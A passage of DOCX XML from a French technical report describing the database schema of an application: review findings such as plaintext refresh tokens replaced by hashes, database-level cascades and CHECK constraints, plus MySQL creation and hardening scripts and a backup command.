        <w:t>Écarts identifiés lors de la revue, et corrections apportées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La rédaction de ce dossier a servi de revue de conception : confronter le modèle à sa propre description fait apparaître des incohérences que le code seul ne signale pas. Trois points ont été relevés, puis corrigés.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Constat initial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correction appliquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Refresh token en clair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user_session.refresh_token</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">stockait le jeton lui-même, alors que</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">password_reset</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ne stockait qu'une empreinte. Une fuite de la base aurait permis de rejouer des sessions actives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Colonne renommée</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">refresh_token_hash</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>(VARCHAR 128 côté MySQL), alimentée par</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">hashlib.sha256(token).hexdigest()</w:t>
            </w:r>
            <w:r>
              <w:t>. L'émission, la vérification et la rotation comparent désormais des empreintes. En SQLite, ALTER TABLE ... RENAME COLUMN conserve le type d'origine VARCHAR(512) : sans incidence, le SGBD n'appliquant pas les longueurs déclarées, et la base de développement étant jetable. L'alignement strict des deux schémas n'est donc obtenu qu'en recréant la base.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cascades déclarées côté ORM seulement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Les cascades depuis</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">n'existaient que dans SQLAlchemy. Une suppression hors application aurait laissé des lignes orphelines, rendant le droit à l'effacement tributaire du code applicatif.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ondelete="CASCADE"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ajouté sur toutes les clés étrangères vers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user.user_id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, en cohérence avec</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">schema_mysql.sql</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Valeurs de statut non contraintes en base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">role</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type_action</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">et</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">format</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">n'étaient validés que par l'application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contraintes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CHECK</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ajoutées dans le script MySQL (§ 5.5).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un quatrième point relevait du commentaire plutôt que du schéma : la documentation de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type_consentement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mentionnait</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openai_data_processing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>comme valeur d'exemple, alors que l'inférence est locale et qu'aucune donnée n'est transmise à OpenAI (§ 5.2). La valeur retenue est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">traitement_ia_local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le schéma de développement et le script de production sont désormais alignés : ce qui était un écart documenté est devenu une propriété du modèle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68692D76" w14:textId="71C3B063" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc198828314"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> script de création ou de modification de la base de données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stratégie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux environnements, deux modes de création.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">développement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le schéma est produit par SQLAlchemy : l'appel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Base.metadata.create_all(engine)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">crée les tables manquantes au premier import du module de persistance. Aucun script à lancer, aucune migration à gérer — ce qui convient à un schéma encore mouvant et à une base jetable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la cible est MySQL 8 et le schéma est créé par un script explicite. Générer le schéma depuis l'ORM au démarrage d'un serveur de production serait une mauvaise pratique : cela donne au compte applicatif des droits de modification de structure, et rend la création du schéma dépendante de l'état du code au moment du démarrage. Le script est versionné, relu, et exécuté par un compte distinct de celui qu'utilise l'application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux scripts sont livrés dans le dépôt, sous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/database/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">schema_mysql.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Création complète du schéma sur une base vierge (§ 5.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">migration_durcissement.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Passage d'une base existante au schéma durci (§ 5.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="X3c9aca75c9d17f5626a50e0d181a3e726cb0229"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Script de création — MySQL 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le script complet est versionné dans le dépôt (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/database/schema_mysql.sql</w:t>
      </w:r>
      <w:r>
        <w:t>) ; ses extraits significatifs figurent ci-dessous et en annexe § 12.4. Trois points de conception s'y lisent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est un mot réservé de MySQL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La colonne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">revoke</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">doit être entourée d'accents graves, faute de quoi la création de la table échoue sur une erreur de syntaxe peu explicite. Sur un projet neuf, nommer cette colonne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">revoked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">éviterait le problème à la source ; le nom actuel a été conservé pour rester aligné sur le modèle SQLAlchemy existant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Les cascades sont déclarées au niveau du SGBD.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chaque clé étrangère vers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user.user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ON DELETE CASCADE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.id_dossier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ON DELETE SET NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La garantie ne dépend donc pas de l'application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Les valeurs autorisées sont contraintes par des</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type_action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et les bornes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">quota_daily_limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— la validation applicative est doublée, pas remplacée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extrait, la table la plus représentative :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4333991" cy="1890613"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="a3e97ea6c143-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4333991" cy="1890613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="X0e99825cc02860403e0e7b75d1b6a5aa94b9bc4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Script de modification — durcissement d'une base existante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce script fait passer une base déjà en service au schéma durci, sans perte de données métier. Les sessions actives ne survivent pas à l'opération : les jetons en clair ne peuvent pas être convertis en empreintes sans connaître le jeton, ce qui déconnecte tous les utilisateurs. C'est le comportement voulu — un jeton stocké en clair doit être considéré comme compromis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4575286" cy="2892606"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="21823d11e4a4-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4575286" cy="2892606"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'ordre des opérations n'est pas indifférent.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La normalisation des libellés (étape 2) précède l'ajout des contraintes (étape 3) : une contrainte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est vérifiée sur les lignes existantes au moment de sa création, et toute ligne non conforme ferait échouer l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nettoyer les données d'abord, contraindre ensuite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sauvegarde préalable est impérative :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump -u root -p helpmedraft &gt; helpmedraft_avant_durcissement.sql</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="72" w:name="X739ecab3cc25d8fc3ca287c46eb75be18a24eed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vérification du schéma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois contrôles valident l'installation après exécution. Le plus utile porte sur les règles de suppression :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="388621"/>
            <wp:docPr id="30" name="Picture 30"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c707c00dd813-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="388621"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il vérifie que chaque clé étrangère porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
